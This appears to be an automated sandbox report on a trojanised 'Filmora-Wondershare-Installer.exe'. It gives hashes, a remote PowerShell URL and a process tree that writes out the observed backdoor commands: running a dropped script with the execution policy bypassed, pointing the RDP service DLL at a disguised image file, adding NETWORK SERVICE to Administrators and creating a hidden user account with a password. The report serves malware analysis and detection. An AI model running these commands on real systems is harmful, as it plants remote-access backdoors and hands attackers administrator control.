Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
20-07-2021 07:50
Static task
static1
Behavioral task
behavioral1
Sample
Filmora-Wondershare-Installer.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Filmora-Wondershare-Installer.exe
Resource
win10v20210410
General
-
Target
Filmora-Wondershare-Installer.exe
-
Size
9.2MB
-
MD5
5e12e56a643c71b913ea60f48f28726d
-
SHA1
8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
-
SHA256
79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
-
SHA512
807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 17 4380 powershell.exe 19 4380 powershell.exe 20 4380 powershell.exe 21 4380 powershell.exe 23 4380 powershell.exe 25 4380 powershell.exe 27 4380 powershell.exe 29 4380 powershell.exe 31 4380 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
ViJoy.exeexe2.exeexe1.exeNFWCHK.exepid process 3016 ViJoy.exe 2152 exe2.exe 3988 exe1.exe 4200 NFWCHK.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Filmora-Wondershare-Installer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation Filmora-Wondershare-Installer.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 2784 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 4972 4972 -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
exe2.exedescription ioc process File opened for modification \??\PhysicalDrive0 exe2.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43A6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43D7.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0mtlacfc.v5h.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43E7.tmp powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43E8.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rot0kpol.xqw.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI43C6.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
exe2.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch exe2.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" exe2.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe -
Modifies registry class 1 IoCs
Processes:
Filmora-Wondershare-Installer.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance Filmora-Wondershare-Installer.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeexe2.exepid process 2784 powershell.exe 2784 powershell.exe 2784 powershell.exe 4316 powershell.exe 4316 powershell.exe 4316 powershell.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 5016 powershell.exe 5016 powershell.exe 5016 powershell.exe 2784 powershell.exe 2784 powershell.exe 2784 powershell.exe 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 4380 powershell.exe 2152 exe2.exe 2152 exe2.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeIncreaseQuotaPrivilege 4316 powershell.exe Token: SeSecurityPrivilege 4316 powershell.exe Token: SeTakeOwnershipPrivilege 4316 powershell.exe Token: SeLoadDriverPrivilege 4316 powershell.exe Token: SeSystemProfilePrivilege 4316 powershell.exe Token: SeSystemtimePrivilege 4316 powershell.exe Token: SeProfSingleProcessPrivilege 4316 powershell.exe Token: SeIncBasePriorityPrivilege 4316 powershell.exe Token: SeCreatePagefilePrivilege 4316 powershell.exe Token: SeBackupPrivilege 4316 powershell.exe Token: SeRestorePrivilege 4316 powershell.exe Token: SeShutdownPrivilege 4316 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeSystemEnvironmentPrivilege 4316 powershell.exe Token: SeRemoteShutdownPrivilege 4316 powershell.exe Token: SeUndockPrivilege 4316 powershell.exe Token: SeManageVolumePrivilege 4316 powershell.exe Token: 33 4316 powershell.exe Token: 34 4316 powershell.exe Token: 35 4316 powershell.exe Token: 36 4316 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeIncreaseQuotaPrivilege 4752 powershell.exe Token: SeSecurityPrivilege 4752 powershell.exe Token: SeTakeOwnershipPrivilege 4752 powershell.exe Token: SeLoadDriverPrivilege 4752 powershell.exe Token: SeSystemProfilePrivilege 4752 powershell.exe Token: SeSystemtimePrivilege 4752 powershell.exe Token: SeProfSingleProcessPrivilege 4752 powershell.exe Token: SeIncBasePriorityPrivilege 4752 powershell.exe Token: SeCreatePagefilePrivilege 4752 powershell.exe Token: SeBackupPrivilege 4752 powershell.exe Token: SeRestorePrivilege 4752 powershell.exe Token: SeShutdownPrivilege 4752 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeSystemEnvironmentPrivilege 4752 powershell.exe Token: SeRemoteShutdownPrivilege 4752 powershell.exe Token: SeUndockPrivilege 4752 powershell.exe Token: SeManageVolumePrivilege 4752 powershell.exe Token: 33 4752 powershell.exe Token: 34 4752 powershell.exe Token: 35 4752 powershell.exe Token: 36 4752 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeIncreaseQuotaPrivilege 5016 powershell.exe Token: SeSecurityPrivilege 5016 powershell.exe Token: SeTakeOwnershipPrivilege 5016 powershell.exe Token: SeLoadDriverPrivilege 5016 powershell.exe Token: SeSystemProfilePrivilege 5016 powershell.exe Token: SeSystemtimePrivilege 5016 powershell.exe Token: SeProfSingleProcessPrivilege 5016 powershell.exe Token: SeIncBasePriorityPrivilege 5016 powershell.exe Token: SeCreatePagefilePrivilege 5016 powershell.exe Token: SeBackupPrivilege 5016 powershell.exe Token: SeRestorePrivilege 5016 powershell.exe Token: SeShutdownPrivilege 5016 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeSystemEnvironmentPrivilege 5016 powershell.exe Token: SeRemoteShutdownPrivilege 5016 powershell.exe Token: SeUndockPrivilege 5016 powershell.exe Token: SeManageVolumePrivilege 5016 powershell.exe Token: 33 5016 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
exe2.exepid process 2152 exe2.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
exe2.exepid process 2152 exe2.exe 2152 exe2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Filmora-Wondershare-Installer.exeViJoy.exeexe1.exepowershell.execsc.exeexe2.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 1868 wrote to memory of 3016 1868 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1868 wrote to memory of 3016 1868 Filmora-Wondershare-Installer.exe ViJoy.exe PID 1868 wrote to memory of 3016 1868 Filmora-Wondershare-Installer.exe ViJoy.exe PID 3016 wrote to memory of 3988 3016 ViJoy.exe exe1.exe PID 3016 wrote to memory of 3988 3016 ViJoy.exe exe1.exe PID 3016 wrote to memory of 2152 3016 ViJoy.exe exe2.exe PID 3016 wrote to memory of 2152 3016 ViJoy.exe exe2.exe PID 3016 wrote to memory of 2152 3016 ViJoy.exe exe2.exe PID 3988 wrote to memory of 2784 3988 exe1.exe powershell.exe PID 3988 wrote to memory of 2784 3988 exe1.exe powershell.exe PID 2784 wrote to memory of 4116 2784 powershell.exe csc.exe PID 2784 wrote to memory of 4116 2784 powershell.exe csc.exe PID 4116 wrote to memory of 4156 4116 csc.exe cvtres.exe PID 4116 wrote to memory of 4156 4116 csc.exe cvtres.exe PID 2152 wrote to memory of 4200 2152 exe2.exe NFWCHK.exe PID 2152 wrote to memory of 4200 2152 exe2.exe NFWCHK.exe PID 2784 wrote to memory of 4316 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 4316 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 4752 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 4752 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 5016 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 5016 2784 powershell.exe powershell.exe PID 2784 wrote to memory of 4240 2784 powershell.exe reg.exe PID 2784 wrote to memory of 4240 2784 powershell.exe reg.exe PID 2784 wrote to memory of 4224 2784 powershell.exe reg.exe PID 2784 wrote to memory of 4224 2784 powershell.exe reg.exe PID 2784 wrote to memory of 1028 2784 powershell.exe reg.exe PID 2784 wrote to memory of 1028 2784 powershell.exe reg.exe PID 2784 wrote to memory of 4728 2784 powershell.exe net.exe PID 2784 wrote to memory of 4728 2784 powershell.exe net.exe PID 4728 wrote to memory of 4340 4728 net.exe net1.exe PID 4728 wrote to memory of 4340 4728 net.exe net1.exe PID 2784 wrote to memory of 4768 2784 powershell.exe cmd.exe PID 2784 wrote to memory of 4768 2784 powershell.exe cmd.exe PID 4768 wrote to memory of 4812 4768 cmd.exe cmd.exe PID 4768 wrote to memory of 4812 4768 cmd.exe cmd.exe PID 4812 wrote to memory of 4856 4812 cmd.exe net.exe PID 4812 wrote to memory of 4856 4812 cmd.exe net.exe PID 4856 wrote to memory of 2760 4856 net.exe net1.exe PID 4856 wrote to memory of 2760 4856 net.exe net1.exe PID 2784 wrote to memory of 4904 2784 powershell.exe cmd.exe PID 2784 wrote to memory of 4904 2784 powershell.exe cmd.exe PID 4904 wrote to memory of 4920 4904 cmd.exe cmd.exe PID 4904 wrote to memory of 4920 4904 cmd.exe cmd.exe PID 4920 wrote to memory of 4936 4920 cmd.exe net.exe PID 4920 wrote to memory of 4936 4920 cmd.exe net.exe PID 4936 wrote to memory of 4956 4936 net.exe net1.exe PID 4936 wrote to memory of 4956 4936 net.exe net1.exe PID 4756 wrote to memory of 5000 4756 cmd.exe net.exe PID 4756 wrote to memory of 5000 4756 cmd.exe net.exe PID 5000 wrote to memory of 5012 5000 net.exe net1.exe PID 5000 wrote to memory of 5012 5000 net.exe net1.exe PID 4772 wrote to memory of 3176 4772 cmd.exe net.exe PID 4772 wrote to memory of 3176 4772 cmd.exe net.exe PID 3176 wrote to memory of 4164 3176 net.exe net1.exe PID 3176 wrote to memory of 4164 3176 net.exe net1.exe PID 4160 wrote to memory of 4196 4160 cmd.exe net.exe PID 4160 wrote to memory of 4196 4160 cmd.exe net.exe PID 4196 wrote to memory of 3708 4196 net.exe net1.exe PID 4196 wrote to memory of 3708 4196 net.exe net1.exe PID 3496 wrote to memory of 4112 3496 cmd.exe net.exe PID 3496 wrote to memory of 4112 3496 cmd.exe net.exe PID 4112 wrote to memory of 4152 4112 net.exe net1.exe PID 4112 wrote to memory of 4152 4112 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"C:\Users\Admin\AppData\Local\Temp\Filmora-Wondershare-Installer.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\Wondershare\NFWCHK.exeC:\Users\Public\Documents\Wondershare\NFWCHK.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f0xtmrhz\f0xtmrhz.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC7.tmp" "c:\Users\Admin\AppData\Local\Temp\f0xtmrhz\CSCE599C57EBA6F41B09372974D9DECE673.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc leaP4oKy /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc leaP4oKy /add2⤵
